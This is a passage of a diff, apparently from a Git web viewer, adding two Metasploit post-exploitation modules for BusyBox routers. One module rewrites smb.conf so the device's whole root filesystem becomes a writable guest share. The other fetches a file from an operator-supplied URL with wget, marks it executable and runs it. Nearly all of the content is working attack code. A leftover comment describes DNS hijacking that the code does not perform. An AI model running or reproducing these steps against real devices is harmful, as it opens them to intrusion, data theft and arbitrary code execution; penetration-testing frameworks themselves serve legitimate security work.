#file? doesnt work because test -f is not implemented in busybox
|
||||
def file_exists(file_path)
|
||||
s = read_file(file_path)
|
||||
if s and s.length
|
||||
return true
|
||||
end
|
||||
return false
|
||||
end
|
||||
|
||||
end
|
74
modules/post/linux/manage/busybox_smb_share_root.rb
Normal file
74
modules/post/linux/manage/busybox_smb_share_root.rb
Normal file
@ -0,0 +1,74 @@
|
||||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Post
|
||||
|
||||
include Msf::Post::File
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'BusyBox Smb Share Root',
|
||||
'Description' => 'This module will be applied on a session connected
|
||||
to a BusyBox sh shell. The script will modify the
|
||||
smb configuration of the the router or device executing
|
||||
BusyBox to share the root directory of the device.',
|
||||
'Author' => 'Javier Vicente Vallejo',
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://vallejo.cc']
|
||||
],
|
||||
'Platform' => ['linux'],
|
||||
'SessionTypes' => ['shell']
|
||||
)
|
||||
|
||||
end
|
||||
|
||||
def run
|
||||
vprint_status("Trying to find smb.conf.")
|
||||
if read_file("/var/samba/smb.conf").length > 0 #file? doesnt work because test -f is not implemented in busybox
|
||||
vprint_status("Smb.conf found.")
|
||||
vprint_status("Trying to find writable directory.")
|
||||
writable_directory = nil
|
||||
writable_directory = "/etc/" if is_writable_directory("/etc")
|
||||
writable_directory = "/mnt/" if (!writable_directory && is_writable_directory("/mnt"))
|
||||
writable_directory = "/var/" if (!writable_directory && is_writable_directory("/var"))
|
||||
writable_directory = "/var/tmp/" if (!writable_directory && is_writable_directory("/var/tmp"))
|
||||
if writable_directory
|
||||
vprint_status("writable directory found, copying smb.conf.")
|
||||
vprint_status(cmd_exec("rm -f #{writable_directory}smb.conf")); Rex::sleep(0.1)
|
||||
vprint_status(cmd_exec("cp -f /var/samba/smb.conf #{writable_directory}smb.conf")); Rex::sleep(0.1)
|
||||
vprint_status(cmd_exec("echo -e '[rootdir]\ncomment = rootdir\npath = /\nbrowseable = yes\nwriteable = yes\nguest ok = yes\n' >> #{writable_directory}smb.conf")); Rex::sleep(0.1)
|
||||
vprint_status(cmd_exec("killall smbd")); Rex::sleep(0.1)
|
||||
vprint_status(cmd_exec("smbd -D -s #{writable_directory}smb.conf")); Rex::sleep(0.1)
|
||||
vprint_status(cmd_exec("smbd -D -s=#{writable_directory}smb.conf")); Rex::sleep(0.1)
|
||||
print_good("Smb configuration has been modified.")
|
||||
else
|
||||
print_error("Writable directory not found.")
|
||||
end
|
||||
else
|
||||
print_error("Smb.conf not found.")
|
||||
end
|
||||
end
|
||||
|
||||
#This function checks if the target directory is writable
|
||||
def is_writable_directory(directory_path)
|
||||
retval = false
|
||||
rand_str = ""; 16.times{rand_str << (65 + rand(25)).chr}
|
||||
file_path = directory_path + "/" + rand_str
|
||||
session.shell_write("echo #{rand_str}XXX#{rand_str} > #{file_path}\n"); Rex::sleep(0.1)
|
||||
(1..5).each{session.shell_read(); Rex::sleep(0.1)}
|
||||
rcv = read_file(file_path)
|
||||
vprint_status("is_writable_directory:"+rcv)
|
||||
if rcv.include? (rand_str+"XXX"+rand_str)
|
||||
retval = true
|
||||
end
|
||||
cmd_exec("rm -f #{file_path}"); Rex::sleep(0.1)
|
||||
return retval
|
||||
end
|
||||
|
||||
end
|
89
modules/post/linux/manage/busybox_wgetandexec.rb
Normal file
89
modules/post/linux/manage/busybox_wgetandexec.rb
Normal file
@ -0,0 +1,89 @@
|
||||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Post
|
||||
|
||||
include Msf::Post::File
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'BusyBox Wget and Exec',
|
||||
'Description' => 'This module will be applied on a session connected
|
||||
to a BusyBox sh shell. The script will use wget to download
|
||||
a file to the router or device executing BusyBox and then
|
||||
it executes the download file.',
|
||||
'Author' => 'Javier Vicente Vallejo',
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://vallejo.cc']
|
||||
],
|
||||
'Platform' => ['linux'],
|
||||
'SessionTypes' => ['shell']
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URL', [true, 'Full URL of file to download.'])
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
#The module tries to update resolv.conf file with the SRVHOST dns address. It tries to update
|
||||
#udhcpd.conf too, with SRVHOST dns address, that should be given to network's hosts via dhcp
|
||||
|
||||
def run
|
||||
vprint_status("Trying to find writable directory.")
|
||||
writable_directory = nil
|
||||
writable_directory = "/etc/" if is_writable_directory("/etc")
|
||||
writable_directory = "/mnt/" if (!writable_directory && is_writable_directory("/mnt"))
|
||||
writable_directory = "/var/" if (!writable_directory && is_writable_directory("/var"))
|
||||
writable_directory = "/var/tmp/" if (!writable_directory && is_writable_directory("/var/tmp"))
|
||||
if writable_directory
|
||||
vprint_status("writable directory found, downloading file.")
|
||||
rand_str = ""; 16.times{rand_str << (65 + rand(25)).chr}
|
||||
random_file_path = writable_directory + rand_str
|
||||
cmd_exec("wget -O #{random_file_path} #{datastore['URL']}"); Rex::sleep(0.1)
|
||||
if file_exists(random_file_path)
|
||||
print_good("File downloaded using wget. Executing it.")
|
||||
cmd_exec("chmod 777 #{random_file_path}"); Rex::sleep(0.1)
|
||||
vprint_status(cmd_exec("sh #{random_file_path}"))
|
||||
else
|
||||
print_error("Unable to download file.")
|
||||
end
|
||||
else
|
||||
print_error("Writable directory not found.")
|
||||
end
|
||||
end
|
||||
|
||||
#This function checks if the target directory is writable
|
||||
|
||||
def is_writable_directory(directory_path)
|
||||
retval = false
|
||||
rand_str = ""; 16.times{rand_str << (65 + rand(25)).chr}
|
||||
file_path = directory_path + "/" + rand_str
|
||||
session.shell_write("echo #{rand_str}XXX#{rand_str} > #{file_path}\n"); Rex::sleep(0.1)
|
||||
(1..5).each{session.shell_read(); Rex::sleep(0.1)}
|
||||
rcv = read_file(file_path)
|
||||
vprint_status("is_writable_directory:"+rcv)
|
||||
if rcv.include? (rand_str+"XXX"+rand_str)
|
||||
retval = true
|
||||
end
|
||||
cmd_exec("rm -f #{file_path}"); Rex::sleep(0.1)
|
||||
return retval
|
||||
end
|
||||
|
||||
#file? doesnt work because test -f is not implemented in busybox
|
||||
def file_exists(file_path)
|
||||
s = read_file(file_path)
|
||||
if s and s.length
|
||||
return true
|
||||
end
|
||||
return false
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue
Block a user